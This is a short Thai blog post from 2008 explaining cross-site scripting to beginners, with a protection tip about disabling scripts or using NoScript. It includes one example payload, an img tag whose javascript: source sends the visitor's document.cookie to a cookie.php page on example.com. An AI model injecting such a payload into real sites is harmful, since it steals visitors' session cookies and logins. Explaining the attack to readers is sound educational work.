*/
  • AAd
  • ranking : สมาชิกทั่วไป
  • email : [email protected]
  • วันที่สร้าง : 2007-04-23
  • จำนวนเรื่อง : 117
  • จำนวนผู้ชม : 363807
  • จำนวนผู้โหวต : 102
  • ส่ง msg :
  • โหวต 102 คน
<< มกราคม 2008 >>
อา พฤ
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

[ Add to my favorite ] [ X ]


ชาว OKNATI คิดอย่างไรกับศึกซักฟอกรัฐบาลชุดนี้ที่ผ่านมา
การอภิปรายดีมาก
184 คน
การอภิปรายอย่างนั้น ๆ แหละ
19 คน
การอภิปรายน่าเบื่อที่สุด
12 คน

  โหวต 215 คน
วันพุธ ที่ 16 มกราคม 2551
Posted by AAd , ผู้อ่าน : 3223 , 19:55:31 น.  
หมวด : การศึกษา

พิมพ์หน้านี้
โหวต 0 คน


XSS คืออะไร แฮกเกอร์มือใหม่ควรรู้จัก.
(XSS (cross site scripting) เป็นวิธีการยอดนิยมที่แฮคเกอร์รู้จักกันดี ซี่งเป็นเทคนิคการฝังโค้ดเข้าไปกับหน้าเวปเพจที่มีช่องโหว่ เมื่อผู้ใช้โหลดหน้าเวปเพจไป ค่าที่สำคัญบางอย่าง เช่น ค่าของ cookie, username, password ,... ก็อาจจะถูกขโมยไปได้

มาดูตัวอย่างการฝังโค้ดกันเลยดีกว่าคับ

<img src='javascript:alert("HACKED BY ITU"); document.location = "http://www.example.com/cookie.php?cookie="+document.cookie;' />

จะเห็นได้ว่า เมื่อผู้ใช้โหลดรูปขึ้นมา ก็จะมี alert ขึ้นมาว่า "HACKED BY ITU" ต่อจากนั้นก็จะเปลี่ยนหน้าเวปเพจไปที่ http://www.example.com/cookie.php พร้อมกับ cookie ของคุณ นั้นหมายความว่า คุณได้โดนขโมย cookie ไปแล้วนั่นเอง...


วิธีป้องกันนะคับ อาจจะไม่ได้ผล 100% แต่ก็สามารถช่วยได้ไม่น้อยทีเดียว
นั่นคือการ Disable Scripting Language ที่ Web Browser
ถ้าใครใช้ firefox ก็โหลด Extension ที่มีชือว่า NoScripts มาลองใช้ดูก็ได้คับ
<รู้ไว้ใช่เสียหาย บทความทาง IE>

อ่านความคิดเห็น

ความคิดเห็นที่ 1 (0)
ย่าดา วันที่ : 16/01/2008 เวลา : 20.00 น.
http://oknation.nationtv.tv/blog/dada
วิญญานอิสระโบยบิ http://www.oknation.net/blog/freesoultofly

มาขอรับความรู้คร้าบ แม้จะไม่ถึงขั้นร้องอ๋อ
ก็รู้ไว้ใช่ว่า ขอบคุณๆๆ

แสดงความคิดเห็น


ถึง บล็อกเกอร์ ทุกท่าน โปรดอ่าน
   ด้วยทาง บริษัท จีเอ็มเอ็ม แกรมมี่ จำกัด (มหาชน) ได้ติดต่อขอความร่วมมือ มายังเว็บไซต์และเว็บบล็อกต่าง ๆ รวมไปถึงเว็บบล็อก OKnation ห้ามให้มีการเผยแพร่ผลงานอันมีลิขสิทธิ์ ของบริษัท จีเอ็มเอ็ม แกรมมี่ฯ บนเว็บ blog โดยกำหนดขอบเขตของสิ่งที่ห้ามทำ และสามารถทำได้ ดังนี้
ห้ามทำ
- การใส่ผลงานเพลงต้นฉบับให้ฟัง ทั้งแบบควบคุมเพลงได้ หรือซ่อนเป็นพื้นหลัง และทั้งที่อยู่ใน server ของคุณเอง หรือ copy code คนอื่นมาใช้
- การเผยแพร่ file ให้ download ทั้งที่อยู่ใน server ของคุณเอง หรือฝากไว้ server คนอื่น
สามารถทำได้
- เผยแพร่เนื้อเพลง ต้องระบุชื่อเพลงและชื่อผู้ร้องให้ชัดเจน
- การใส่เพลงที่ร้องไว้เอง ต้องระบุชื่อผู้ร้องต้นฉบับให้ชัดเจน
จึงเรียนมาเพื่อโปรดปฎิบัติตาม มิเช่นนั้นทางบริษัท จีเอ็มเอ็ม แกรมมี่ฯ จะให้ฝ่ายดูแลลิขสิทธิ์ ดำเนินการเอาผิดกับท่านตามกฎหมายละเมิดลิขสิทธิ์
OKNATION



กฎกติกาการเขียนเรื่องและแสดงความคิดเห็น
1 การเขียน หรือแสดงความคิดเห็นใด ๆ ต้องไม่หมิ่นเหม่ หรือกระทบต่อสถาบันชาติ ศาสนา และพระมหากษัตริย์ หรือกระทบต่อความมั่นคงของชาติ
2. ไม่ใช้ถ้อยคำหยาบคาย ดูหมิ่น ส่อเสียด ให้ร้ายผู้อื่นในทางเสียหาย หรือสร้างความแตกแยกในสังคม กับทั้งไม่มีภาพ วิดีโอคลิป หรือถ้อยคำลามก อนาจาร
3. ความขัดแย้งส่วนตัวที่เกิดจากการเขียนเรื่อง แสดงความคิดเห็น หรือในกล่องรับส่งข้อความ (หลังไมค์) ต้องไม่นำมาโพสหรือขยายความต่อในบล็อก และการโพสเรื่องส่วนตัว และการแสดงความคิดเห็น ต้องใช้ภาษาที่สุภาพเท่านั้น
4. พิจารณาเนื้อหาที่จะโพสก่อนเผยแพร่ให้รอบคอบ ว่าจะไม่เป็นการละเมิดกฎหมายใดใด และปิดคอมเมนต์หากจำเป็นโดยเฉพาะเรื่องที่มีเนื้อหาพาดพิงสถาบัน
5.การนำเรื่อง ภาพ หรือคลิปวิดีโอ ที่มิใช่ของตนเองมาลงในบล็อก ควรอ้างอิงแหล่งที่มา และ หลีกเลี่ยงการเผยแพร่สิ่งที่ละเมิดลิขสิทธิ์ ไม่ว่าจะเป็นรูปแบบหรือวิธีการใดก็ตาม 6. เนื้อหาและความคิดเห็นในบล็อก ไม่เกี่ยวข้องกับทีมงานผู้ดำเนินการจัดทำเว็บไซต์ โดยถือเป็นความรับผิดชอบทางกฎหมายเป็นการส่วนตัวของสมาชิก
คลิ้กอ่านเงื่อนไขทั้งหมดที่นี่"
OKnation ขอสงวนสิทธิ์ในการปิดบล็อก ลบเนื้อหาและความคิดเห็น ที่ขัดต่อความดังกล่าวข้างต้น โดยไม่ต้องชี้แจงเหตุผลใดๆ ต่อเจ้าของบล็อกและเจ้าของความคิดเห็นนั้นๆ
   

กลับไปหน้าที่แล้ว กลับด้านบน